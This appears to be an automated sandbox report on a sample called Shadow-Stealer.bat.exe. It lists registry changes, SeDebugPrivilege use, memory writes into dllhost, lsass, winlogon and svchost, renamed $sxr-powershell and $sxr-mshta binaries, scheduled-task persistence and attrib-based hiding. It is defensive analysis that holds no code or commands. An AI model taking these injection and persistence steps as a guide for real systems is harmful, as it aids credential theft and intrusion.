Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \Registry\User\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\NotificationData C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Windows\Explorer.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4272 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 4272 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4916 wrote to memory of 752 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 4916 wrote to memory of 752 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 752 wrote to memory of 3376 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 752 wrote to memory of 3376 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3376 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4656 wrote to memory of 608 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 4656 wrote to memory of 696 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 4656 wrote to memory of 980 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 428 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 4656 wrote to memory of 456 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 976 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4656 wrote to memory of 1056 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4656 wrote to memory of 1068 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1160 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1184 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1272 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4656 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1356 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1456 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1504 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

